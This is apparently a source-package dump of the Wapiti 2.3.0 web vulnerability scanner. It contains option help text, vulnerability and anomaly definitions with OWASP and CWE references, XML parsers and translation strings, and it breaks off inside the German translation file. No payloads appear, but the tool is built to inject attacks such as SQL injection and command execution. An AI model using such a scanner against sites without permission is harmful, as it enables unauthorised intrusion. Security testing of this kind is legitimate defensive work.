-n --nice Menentukan had URL untuk mencari dengan pola yang sama (iaitu, bilangan maksimum nilai-nilai yang unik bagi parameter yang sama). Gunakan pilihan ini untuk menghalang 'loop' berterusan semasa imbasan. Had mesti lebih daripada 0. -m --module Menyediakan modul (dan kaedah HTTP untuk setiap modul) untuk diguna ketika serangan. Guna prefiks nama modul dengan 'dash' untuk menyahaktifkan modul yang berkaitan. Untuk hanya mencari sasaran (tanpa menghantar sebarang muatan), menyahaktifkan setiap modul dengan -m "-all". Jika anda tidak menentukan kaedah HTTP, GET dan POST akan digunakan. Contoh: -m "-all,xss:get,exec:post" -u --color Menggunakan warna untuk menyerlahkan kelemahan dan keganjilan (anomalies) dalam output. -v --verbose Tetapkan tahap verbositi. 0:tenang (default), 1: cetak setiap URL, 2: cetak setiap serangan. -b --scope Set skop imbasan: + page: untuk menganalisis hanya muka laman yang diberikan sebagai URL asas. + folder: untuk menganalisis semua URL di bawah URL asas dihantar ke Wapiti (default). + domain: untuk menganalisis semua pautan pada muka laman yang mengandungi domain URL sama yang dihantar ke Wapiti. -f --format Set jenis format untuk laporan. json: Laporan dalam format JSON html: Laporan dalam format HTML (default) openvas: Laporan dalam format OpenVAS XML txt: Laporran dalam teks biasa (UTF-8) vulneranet: Laporan dalam format VulneraNET (berasaskan XML) xml: Laporan dalam format XML -o --output Tetapkan nama fail laporan. Jika format laporan yang dipilih adalah 'html', parameter ini akan digunakan sebagai nama direktori. -i --continue Parameter ini menyatakan kepada Wapiti untuk menyambung imbasan sebelumnya yang disimpan di dalam fail status XML yang ditentukan sebelum ini. Nama fail adalah pilihan, jika tidak dinyatakan, Wapiti mengambil fail default daripada direktori "scans". 
-k --attack Parameter ini menyatakan kepada Wapiti untuk meneruskan serangan tanpa mengimbas laman web sekali lagi, memuatkan status imbasan daripada fail yang ditentukan. Nama fail adalah pilihan, jika ia tidak dinyatakan, Wapiti mengambil defaultfail daripada direktori "scans". --verify-ssl <0|1> Parameter ini menyatakan sama ada Wapiti perlu menyemak Sijil SSL. Default adalah untuk mengesahkan sijil-sijil -h --help Untuk mencetak mesej penggunaan ini {0} : {1:>3} {0} HtAccess{0} in {1} melalui suntikan pada parameter {2}{0} in {1} melalui suntikan pada rentetan perintah(query string) {0} in {1} melalui suntikan pada sumber laluan{0} melalui suntikan pada parameter {1}{0} melalui suntikan pada rentetan perintah (query string)Kod |HTTP: {0}|HTTP Kod: {0} : {1}

wapiti-2.3.0+dfsg/wapitiCore/config/reports/
wapiti-2.3.0+dfsg/wapitiCore/config/reports/generators.xml

XML format xml xmlreportgenerator XMLReportGenerator
HTML format html htmlreportgenerator HTMLReportGenerator
TXT format txt txtreportgenerator TXTReportGenerator
VulneraNET format vulneranet vulneranetxmlreportgenerator VulneraNetXMLReportGenerator
JSON format json jsonreportgenerator JSONReportGenerator
OpenVAS XML format openvas openvasreportgenerator OpenVASReportGenerator

wapiti-2.3.0+dfsg/wapitiCore/config/vulnerabilities/
wapiti-2.3.0+dfsg/wapitiCore/config/vulnerabilities/anomalies.xml

Internal server error description
Wikipedia article for 5xx HTTP error codes https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#5xx_Server_Error

Resource consumption description
http://www.owasp.org/index.php/Asymmetric_resource_consumption_(amplification)
http://www.owasp.org/index.php/Asymmetric_resource_consumption_(amplification)
CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion') http://cwe.mitre.org/data/definitions/400.html

wapiti-2.3.0+dfsg/wapitiCore/config/vulnerabilities/vulnerabilities.xml

SQL Injection description
http://www.owasp.org/index.php/SQL_Injection http://www.owasp.org/index.php/SQL_Injection
http://en.wikipedia.org/wiki/SQL_injection http://en.wikipedia.org/wiki/SQL_injection
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') http://cwe.mitre.org/data/definitions/89.html

Blind SQL Injection description
http://www.owasp.org/index.php/Blind_SQL_Injection http://www.owasp.org/index.php/Blind_SQL_Injection
http://www.imperva.com/resources/adc/blind_sql_server_injection.html http://www.imperva.com/resources/adc/blind_sql_server_injection.html
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') http://cwe.mitre.org/data/definitions/89.html

File Handling description
http://www.owasp.org/index.php/Path_Traversal http://www.owasp.org/index.php/Path_Traversal
http://www.acunetix.com/websitesecurity/directory-traversal.htm http://www.acunetix.com/websitesecurity/directory-traversal.htm
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') http://cwe.mitre.org/data/definitions/22.html

Cross Site Scripting description
http://www.owasp.org/index.php/Cross_Site_Scripting http://www.owasp.org/index.php/Cross_Site_Scripting
http://en.wikipedia.org/wiki/Cross-site_scripting http://en.wikipedia.org/wiki/Cross-site_scripting
VulneraNET wiki: Cross Site Scripting Flaw article http://lab.gsi.dit.upm.es/semanticwiki/index.php/Cross_Site_Scripting_Flaw
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
http://cwe.mitre.org/data/definitions/79.html

CRLF description
http://www.owasp.org/index.php/CRLF_Injection http://www.owasp.org/index.php/CRLF_Injection
http://www.acunetix.com/websitesecurity/crlf-injection.htm http://www.acunetix.com/websitesecurity/crlf-injection.htm
VulneraNET wiki: CRLF Injection article http://lab.gsi.dit.upm.es/semanticwiki/index.php/CRLF_Injection
CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection') http://cwe.mitre.org/data/definitions/93.html

Commands execution description
http://www.owasp.org/index.php/Command_Injection http://www.owasp.org/index.php/Command_Injection
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') http://cwe.mitre.org/data/definitions/78.html

Htaccess bypass description
http://blog.teusink.net/2009/07/common-apache-htaccess-misconfiguration.html http://blog.teusink.net/2009/07/common-apache-htaccess-misconfiguration.html
CWE-538: File and Directory Information Exposure http://cwe.mitre.org/data/definitions/538.html

Backup file description
Testing for Old, Backup and Unreferenced Files (OWASP-CM-006) http://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)
CWE-530: Exposure of Backup File to an Unauthorized Control Sphere http://cwe.mitre.org/data/definitions/530.html

Potentially dangerous file description
The Open Source Vulnerability Database http://osvdb.org/

wapiti-2.3.0+dfsg/wapitiCore/file/
wapiti-2.3.0+dfsg/wapitiCore/file/__init__.py
wapiti-2.3.0+dfsg/wapitiCore/file/anomalyxmlparser.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2013 Nicolas Surribas
#
# This
# program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from xml.parsers import expat
from wapitiCore.language.vulnerability import Anomaly


class AnomalyXMLParser(object):

    ANOMALY = "anomaly"
    ANOMALY_NAME = "name"
    ANOMALY_DESCRIPTION = "description"
    ANOMALY_SOLUTION = "solution"
    ANOMALY_REFERENCE = "reference"
    ANOMALY_REFERENCES = "references"
    ANOMALY_REFERENCE_TITLE = "title"
    ANOMALY_REFERENCE_URL = "url"

    anomalies = []
    anom = None
    references = {}
    title = ""
    url = ""
    tag = ""

    def __init__(self):
        self._parser = expat.ParserCreate()
        self._parser.StartElementHandler = self.start_element
        self._parser.EndElementHandler = self.end_element
        self._parser.CharacterDataHandler = self.char_data

    def parse(self, fileName):
        f = None
        try:
            f = open(fileName)
            content = f.read()
            self.feed(content)
        finally:
            if f is not None:
                f.close()

    def feed(self, data):
        self._parser.Parse(data, 0)

    def close(self):
        self._parser.Parse("", 1)
        del self._parser

    def start_element(self, name, attrs):
        if name == self.ANOMALY:
            self.anom = Anomaly()
            self.anom.setName(attrs[self.ANOMALY_NAME])
        elif name == self.ANOMALY_DESCRIPTION:
            self.tag = self.ANOMALY_DESCRIPTION
        elif name == self.ANOMALY_SOLUTION:
            #self.tag = self.ANOMALY_SOLUTION
            self.anom.setSolution(attrs["text"])
        elif name == self.ANOMALY_REFERENCES:
            self.references = {}
        elif name == self.ANOMALY_REFERENCE:
            self.tag = self.ANOMALY_REFERENCE
        elif name == self.ANOMALY_REFERENCE_TITLE:
            self.tag = self.ANOMALY_REFERENCE_TITLE
        elif name == self.ANOMALY_REFERENCE_URL:
            self.tag = self.ANOMALY_REFERENCE_URL

    def end_element(self, name):
        if name == self.ANOMALY:
            self.anomalies.append(self.anom)
        elif name == self.ANOMALY_REFERENCE:
            self.references[self.title] = self.url
        elif name == self.ANOMALY_REFERENCES:
            self.anom.setReferences(self.references)

    def char_data(self, data):
        if self.tag == self.ANOMALY_DESCRIPTION:
            self.anom.setDescription(data)
        # elif self.tag==self.ANOMALY_SOLUTION:
        #     self.anom.setSolution(data)
        elif self.tag == self.ANOMALY_REFERENCE_TITLE:
            self.title = data
        elif self.tag == self.ANOMALY_REFERENCE_URL:
            self.url = data
        self.tag = ""

    def getAnomalies(self):
        return self.anomalies

wapiti-2.3.0+dfsg/wapitiCore/file/auxtext.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# Original authors :
# David del Pozo
# Alberto Pastor
# Copyright (C) 2008 Informatica Gesfor
# ICT Romulus (http://www.ict-romulus.eu)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA


class AuxText(object):
    """Class for reading and writing in text files"""

    def readLines(self, fileName):
        """Returns the non-empty lines of the file as a list."""
        lines = []
        f = None
        try:
            # Reminder : don't try to read payload files as UTF-8, must give str type
            f = open(fileName)
            for line in f:
                cleanLine = line.strip(" \n")
                # Expand the placeholders used in payload files
                cleanLine = cleanLine.replace("[TAB]", "\t")
                cleanLine = cleanLine.replace("[LF]", "\n")
                if cleanLine != "":
                    lines.append(cleanLine.replace("\\0", "\0"))
        except IOError as e:
            print(e)
        finally:
            # Always release the file handle, even when reading fails
            if f is not None:
                f.close()
        return lines


if __name__ == "__main__":
    try:
        l = AuxText()
        ll = l.readLines("./config/execPayloads.txt")
        for li in ll:
            print(li)
    except SystemExit:
        pass

wapiti-2.3.0+dfsg/wapitiCore/file/reportgeneratorsxmlparser.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# Original author :
# David del Pozo
# Alberto Pastor
# Copyright (C) 2008 Informatica Gesfor
# ICT Romulus (http://www.ict-romulus.eu)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from xml.parsers import expat
from wapitiCore.report.reportgeneratorinfo import ReportGeneratorInfo


class ReportGeneratorsXMLParser(object):

    REPORT_GENERATOR = "reportGenerator"
    REPORT_GENERATOR_KEY = "reportTypeKey"
    REPORT_GENERATOR_CLASS_MODULE = "classModule"
    REPORT_GENERATOR_CLASSNAME = "className"

    reportGenerators = []
    repGen = None
    tag = ""

    def __init__(self):
        self._parser = expat.ParserCreate()
        self._parser.StartElementHandler = self.start_element
        self._parser.EndElementHandler = self.end_element
        self._parser.CharacterDataHandler = self.char_data

    def parse(self, fileName):
        f = None
        try:
            f = open(fileName)
            content = f.read()
            self.feed(content)
        finally:
            if f is not None:
                f.close()

    def feed(self, data):
        self._parser.Parse(data, 0)

    def close(self):
        self._parser.Parse("", 1)
        del self._parser

    def start_element(self, name, attrs):
        if name == self.REPORT_GENERATOR:
            self.repGen = ReportGeneratorInfo()
        elif name == self.REPORT_GENERATOR_KEY:
            self.tag = self.REPORT_GENERATOR_KEY
        elif name == self.REPORT_GENERATOR_CLASSNAME:
            self.tag = self.REPORT_GENERATOR_CLASSNAME
        elif name == self.REPORT_GENERATOR_CLASS_MODULE:
            self.tag = self.REPORT_GENERATOR_CLASS_MODULE

    def end_element(self, name):
        if name == self.REPORT_GENERATOR:
            self.reportGenerators.append(self.repGen)

    def char_data(self, data):
        if self.tag == self.REPORT_GENERATOR_KEY:
            self.repGen.setKey(data)
        elif self.tag == self.REPORT_GENERATOR_CLASSNAME:
            self.repGen.setClassName(data)
        elif self.tag == self.REPORT_GENERATOR_CLASS_MODULE:
            self.repGen.setClassModule(data)
        self.tag = ""

    def getReportGenerators(self):
        return self.reportGenerators

wapiti-2.3.0+dfsg/wapitiCore/file/vulnerabilityxmlparser.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# Original author :
# David del Pozo
# Alberto Pastor
# Copyright (C) 2008 Informatica Gesfor
# ICT Romulus (http://www.ict-romulus.eu)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from xml.parsers import expat
from wapitiCore.language.vulnerability import Vulnerability


class VulnerabilityXMLParser(object):

    VULNERABILITY = "vulnerability"
    VULNERABILITY_NAME = "name"
    VULNERABILITY_DESCRIPTION = "description"
    VULNERABILITY_SOLUTION = "solution"
    VULNERABILITY_REFERENCE = "reference"
    VULNERABILITY_REFERENCES = "references"
    VULNERABILITY_REFERENCE_TITLE = "title"
    VULNERABILITY_REFERENCE_URL = "url"

    vulnerabilities = []
    vul = None
    references = {}
    title = ""
    url = ""
    tag = ""

    def __init__(self):
        self._parser = expat.ParserCreate()
        self._parser.StartElementHandler = self.start_element
        self._parser.EndElementHandler = self.end_element
        self._parser.CharacterDataHandler = self.char_data

    def parse(self, fileName):
        f = None
        try:
            f = open(fileName)
            content = f.read()
            self.feed(content)
        finally:
            if f is not None:
                f.close()

    def feed(self, data):
        self._parser.Parse(data, 0)

    def close(self):
        self._parser.Parse("", 1)
        del self._parser

    def start_element(self, name, attrs):
        if name == self.VULNERABILITY:
            self.vul = Vulnerability()
            self.vul.setName(attrs[self.VULNERABILITY_NAME])
        elif name == self.VULNERABILITY_DESCRIPTION:
            self.tag = self.VULNERABILITY_DESCRIPTION
        elif name == self.VULNERABILITY_SOLUTION:
            #self.tag = self.VULNERABILITY_SOLUTION
            self.vul.setSolution(attrs["text"])
        elif name == self.VULNERABILITY_REFERENCES:
            self.references = {}
        elif name == self.VULNERABILITY_REFERENCE:
            self.tag = self.VULNERABILITY_REFERENCE
        elif name == self.VULNERABILITY_REFERENCE_TITLE:
            self.tag = self.VULNERABILITY_REFERENCE_TITLE
        elif name == self.VULNERABILITY_REFERENCE_URL:
            self.tag = self.VULNERABILITY_REFERENCE_URL

    def end_element(self, name):
        if name == self.VULNERABILITY:
            self.vulnerabilities.append(self.vul)
        elif name == self.VULNERABILITY_REFERENCE:
            self.references[self.title] = self.url
        elif name == self.VULNERABILITY_REFERENCES:
            self.vul.setReferences(self.references)

    def char_data(self, data):
        if self.tag == self.VULNERABILITY_DESCRIPTION:
            self.vul.setDescription(data)
        # elif self.tag==self.VULNERABILITY_SOLUTION:
        #     self.vul.setSolution(data)
        elif self.tag == self.VULNERABILITY_REFERENCE_TITLE:
            self.title = data
        elif self.tag == self.VULNERABILITY_REFERENCE_URL:
            self.url = data
        self.tag = ""

    def getVulnerabilities(self):
        return self.vulnerabilities

wapiti-2.3.0+dfsg/wapitiCore/language/
wapiti-2.3.0+dfsg/wapitiCore/language/__init__.py
wapiti-2.3.0+dfsg/wapitiCore/language/language.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# Original author :
# David del Pozo
# Alberto Pastor
# Copyright (C) 2008 Informatica Gesfor
# ICT Romulus (http://www.ict-romulus.eu)
#
# This program is free software; you can redistribute it and/or
# modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import locale
import gettext
import sys


class Language(object):
    """
    This class configures the internationalization of Wapiti, retrieving the texts
    from the files that hold the translations. It establishes the function "_" for
    translating. To do so, the method "configure" should be invoked.
    """

    AVAILABLE_LANGS = ["de", "en", "es", "fr", "ms"]
    if hasattr(sys, "frozen"):
        BASE_DIR = os.path.join(os.path.dirname(unicode(sys.executable, sys.getfilesystemencoding())), "data")
    else:
        BASE_DIR = os.path.dirname(sys.modules['wapitiCore'].__file__)
    LANG_PATH = os.path.join(BASE_DIR, "config", "language")

    def configure(self, lang=None):
        """
        Configures the function "_" for translating the texts of Wapiti.
        This method loads the language given as parameter or, if the parameter
        is not specified, takes the default language of the operating system.
        """
        if lang is None:
            # if lang is not specified, default language is used
            defLocale = locale.getdefaultlocale()
            langCounty = defLocale[0]  # en_UK
            # getdefaultlocale() may return (None, None) when no locale is set
            lang = langCounty[:2] if langCounty else 'en'  # en
        if lang not in self.AVAILABLE_LANGS:
            # if lang is not one of the supported languages, we use english
            print("Oups! No translations found for your language... Using english.")
            print("Please send your translations for improvements.")
            print("===============================================================")
            lang = 'en'
        lan = gettext.translation('wapiti',
                                  self.LANG_PATH,
                                  languages=[lang],
                                  codeset="UTF-8")
        lan.install(unicode=1)

        # function which translates
        def _(key):
            return lan.lgettext(key)

wapiti-2.3.0+dfsg/wapitiCore/language/vulnerability.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA


class GenericFlaw(object):
    #Constants
    MSG_EVIL_URL = _(" Evil url: {0}")
    MSG_PARAM_INJECT = _("{0} in {1} via injection in the parameter {2}")
    MSG_FROM = _(" coming from {0}")
    MSG_QS_INJECT = _("{0} in {1} via injection in the query string")
    MSG_PATH_INJECT = _("{0} in {1} via injection in the resource path")
    MSG_EVIL_PARAM = _("Involved parameter: {0}")
    MSG_EVIL_REQUEST = _("Evil request:")

    HIGH_LEVEL = "1"
    MEDIUM_LEVEL = "2"
    LOW_LEVEL = "3"

    name = ""
    description = ""
    solution = ""
    references = {}

    def getName(self):
        return self.name

    def getDescription(self):
        return self.description

    def getSolution(self):
        return self.solution

    def getReferences(self):
        return self.references

    def setName(self, name):
        self.name = name

    def setDescription(self, description):
        self.description = description

    def setSolution(self, solution):
        self.solution = solution

    def setReferences(self, references):
        self.references = references


class Vulnerability(GenericFlaw):
    #Constants
    SQL_INJECTION = _("SQL Injection")
    BLIND_SQL_INJECTION = _("Blind SQL Injection")
    FILE_HANDLING = _("File Handling")
    XSS = _("Cross Site Scripting")
    CRLF = _("CRLF Injection")
    EXEC = _("Commands execution")
    HTACCESS = _("Htaccess Bypass")
    BACKUP = _("Backup file")
    NIKTO = _("Potentially dangerous file")


class Anomaly(GenericFlaw):
    #Constants
    ERROR_500 = _("Internal Server Error")
    RES_CONSUMPTION = _("Resource consumption")

    MSG_500 = _("Received a HTTP 500 error in {0}")
    MSG_TIMEOUT = _("Timeout occured in {0}")

    MSG_QS_TIMEOUT = _("The request timed out while attempting to inject a payload in the query string")
    MSG_PATH_TIMEOUT = _("The request timed out while attempting to inject a payload in the resource path")
    MSG_PARAM_TIMEOUT = _("The request timed out while attempting to inject a payload in the parameter {0}")
    MSG_QS_500 = _("The server responded with a 500 HTTP error code "
                   "while attempting to inject a payload in the query string")
    MSG_PATH_500 = _("The server responded with a 500 HTTP error code "
                     "while attempting to inject a payload in the resource path")
    MSG_PARAM_500 = _("The server responded with a 500 HTTP error code "
                      "while attempting to inject a payload in the parameter {0}")

# The only reason those lines are here is to allow the translation script to find them
_("Backup file description")
_("Backup file solution")
_("Blind SQL Injection description")
_("Blind SQL Injection solution")
_("Commands execution description")
_("Commands execution solution")
_("CRLF description")
_("CRLF solution")
_("Cross Site Scripting description")
_("Cross Site Scripting solution")
_("File Handling description")
_("File Handling solution")
_("Htaccess bypass description")
_("Htaccess bypass solution")
_("Internal server error description")
_("Internal server error solution")
_("Potentially dangerous file description")
_("Potentially dangerous file solution")
_("Resource consumption description")
_("Resource consumption solution")
_("SQL Injection description")
_("SQL Injection solution")

wapiti-2.3.0+dfsg/wapitiCore/language_sources/
wapiti-2.3.0+dfsg/wapitiCore/language_sources/de.po

# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS
# This file is distributed under the same license as the Wapiti package.
#
#, fuzzy
msgid ""
msgstr ""
"Project-Id-Version: Wapiti SVN\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2013-08-25 17:33+0200\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME \n"
"Language-Team: LANGUAGE \n"
"Language: \n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"

#: ../vulnerability.py:23
msgid " Evil url: {0}"
msgstr " Böse URL: {0}"

#: ../vulnerability.py:24
msgid "{0} in {1} via injection in the parameter {2}"
msgstr "{0} in {1} durch Injektion in den Parameter {2}"

#: ../vulnerability.py:25
msgid " coming from {0}"
msgstr " von {0} kommend"

#: ../vulnerability.py:26
msgid "{0} in {1} via injection in the query string"
msgstr "{0} in {1} durch Injektion in den Query-String"

#: ../vulnerability.py:27
msgid "{0} in {1} via injection in the resource path"
msgstr "{0} in {1} durch Injektion in den Ressourcenpfad"

#: ../vulnerability.py:28
msgid "Involved parameter: {0}"
msgstr "Betreffender Parameter: {0}"

#: ../vulnerability.py:29
msgid "Evil request:"
msgstr "Böse Anfrage:"

#: ../vulnerability.py:67
msgid "SQL Injection"
msgstr "SQL Injektion"

#: ../vulnerability.py:68
msgid "Blind SQL Injection"
msgstr "Blinde SQL Injektion"

#: ../vulnerability.py:69
msgid "File Handling"
msgstr "Dateihandhabung"

#: ../vulnerability.py:70
msgid "Cross Site Scripting"
msgstr "Cross-Site Scripting"

#: ../vulnerability.py:72
msgid "Commands execution"
msgstr "Befehlsausführung"

#: ../vulnerability.py:73
msgid "Htaccess Bypass"
msgstr "Htaccess Überwindung"

#: ../vulnerability.py:74
msgid "Backup file"
msgstr "Sicherungsdatei"

#: ../vulnerability.py:75
msgid "Potentially dangerous file"
msgstr "Möglicherweise gefährliche Datei"

#: ../vulnerability.py:80
msgid "Internal Server Error"
msgstr "Interner Server Fehler"

#: ../vulnerability.py:81
msgid "Resource consumption"
msgstr "Ressourcenverbrauch"

#: ../vulnerability.py:83
msgid "Received a HTTP 500 error in {0}"
msgstr "HTTP Fehler 500 erhalten in {0}"

#: ../vulnerability.py:84
msgid "Timeout occured in {0}"
msgstr "Zeitlimit überschritten in {0}"

#: ../vulnerability.py:86
msgid "The request timed out while attempting to inject a payload in the query string"
msgstr "Zeitüberschreitung der Anfrage beim Versuch ein Payload in den Query-String zu injizieren"

#: ../vulnerability.py:87
msgid "The request timed out while attempting to inject a payload in the resource path"
msgstr "Zeitüberschreitung der Anfrage beim Versuch ein Payload in den Ressourcenpfad zu injizieren"

#: ../vulnerability.py:88
msgid "The request timed out while attempting to inject a payload in the parameter {0}"
msgstr "Zeitüberschreitung der Anfrage beim Versuch ein Payload in den Parameter {0} zu injizieren"

#: ../vulnerability.py:90
msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string"
msgstr "Der Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Query-String zu injizieren"

#: ../vulnerability.py:92
msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path"
msgstr "Der Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Ressourcenpfad zu injizieren"

#: ../vulnerability.py:94
msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}"
msgstr "Der Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Parameter {0} zu injizieren"

#: ../wapiti.py:69
msgid "Invalid argument for option {0} : {1}"
msgstr "Ungültiger Parameter für die Option {0} : {1}"

#: ../wapiti.py:226
msgid "[*] Loading modules:"
msgstr "[*] Lade Module:"

#: ../wapiti.py:297
msgid "No links or forms found in this page !"
msgstr "Keine Links oder Formulare auf der Seite gefunden !"

#: ../wapiti.py:298
msgid "Make sure the url is correct."
msgstr "Prüfen Sie, ob die URL korrekt ist."

#: ../wapiti.py:310
msgid "[!] Missing dependecies for module {0}:"
msgstr "[!] Fehlende Abhängigkeiten für Modul {0}:"

#: ../wapiti.py:316
msgid "[+] Launching module {0}"
msgstr "[+] Starte Modul {0}"

#: ../wapiti.py:321
msgid "Upload scripts found:"
msgstr "Upload-Skripte gefunden:"

#: ../wapiti.py:335
msgid "Report"
msgstr "Bericht"

#: ../wapiti.py:337
msgid "A report has been generated in the file {0}"
msgstr "Ein Bericht wurde in der Datei {0} erzeugt"

#: ../wapiti.py:339
msgid "Open {0}/index.html with a browser to see this report."
msgstr "Öffnen Sie {0}/index.html in einem Browser um diesen Bericht zu sehen."

#: ../wapiti.py:410
msgid "wapitiDoc"
msgstr ""
"Wapiti-2.3.0 - Sicherheitsscanner für Webanwendungen \n"
" \n"
" Befehlszeile: python wapiti.py http://server.com/base/url/ [Optionen] \n"
" \n"
" Unterstützte Optionen sind: \n"
" -s \n"
" --start \n"
" \tUm eine URL anzugeben, von der begonnen werden soll. Diese Option kann mehrfach verwendet werden.\n"
" \tWapiti wird diese Links nach weiteren URLs durchsuchen, auch wenn der angegebene Link nicht dem Suchmuster entspricht.\n"
" \n"
" -x \n"
" --exclude \n"
" \tUm eine URL vom Scan auszulassen (z.B. Logout-URLs). Diese Option kann für verschiedene URLs mehrfach verwendet werden.\n"
" \tPlatzhalter (*) können in der URL für einfache reguläre Ausdrücke verwendet werden.\n"
" \tBeispiel : -x http://server/base/?page=*&module=test\n"
" \tor -x http://server/base/admin/* um ein Verzeichnis auszulassen.\n"
" \n"
" -p \n"
" --proxy \n"
" \tUm einen Proxy anzugeben. Zur Zeit werden HTTP- und HTTPS-Proxys unterstützt.\n"
" \tDiese Option kann mehrfach verwendet werden, um HTTP- und HTTPS-Proxys anzugeben.\n"
" \tBeispiel: -p http://proxy:port/\n"
" \n"
" -c \n"
" --cookie \n"
" \tUm Cookies für den Scan zu importieren. Die Cookie-Datei muss im JSON-Format sein.\n"
" \tCookies können mit Hilfe der Werkzeuge cookie.py und getcookie.py (net-Verzeichnis) aufgezeichnet werden.\n"
" \n"
" -t \n"
" --timeout \n"
" \tUm ein Zeitlimit zu setzen (Maximalzeit in Sekunden, die auf eine Serverantwort gewartet werden soll).\n"
" \n"
" -a \n"
" --auth \n"
" \tZugangsdaten für HTTP-Authentifizierung setzen.\n"
" \n"
" --auth-method \n"
" \tWenn der Server eine Authentifizierung erfordert, kann so die Authentifizierungsmethode gesetzt werden.\n"
" \tZur Zeit unterstützte Methoden sind (einige erfordern die Installation von Zusatzmodulen):\n"
" \t\t+ basic\n"
" \t\t+ digest\n"
" \t\t+ kerberos\n"
" \t\t+ ntlm\n"
" \n"
" -r \n"
" --remove \n"
" \tEinen Parameter (Name und Wert) von URLs entfernen.\n"
" \n"
" -n \n"
" --nice \n"
" \tEine Maximale Anzahl von URLs mit dem gleichen Suchmuster festlegen (z.B. die maximale Anzahl einzigartiger Werte für einen Parameter).\n"
" \tBenutzen Sie diese Option, um Endlosschleifen während des Scans zu verhindern. Das Limit muss größer als 0 sein.\n"
" \n"
" -m \n"
" --module \n"
" \tModule (und HTTP-Methoden für jedes Modul) für die Angriffe festlegen.\n"
" \tEinem Modul kann ein Bindestrich vorangestellt werden, um es zu deaktivieren.\n"
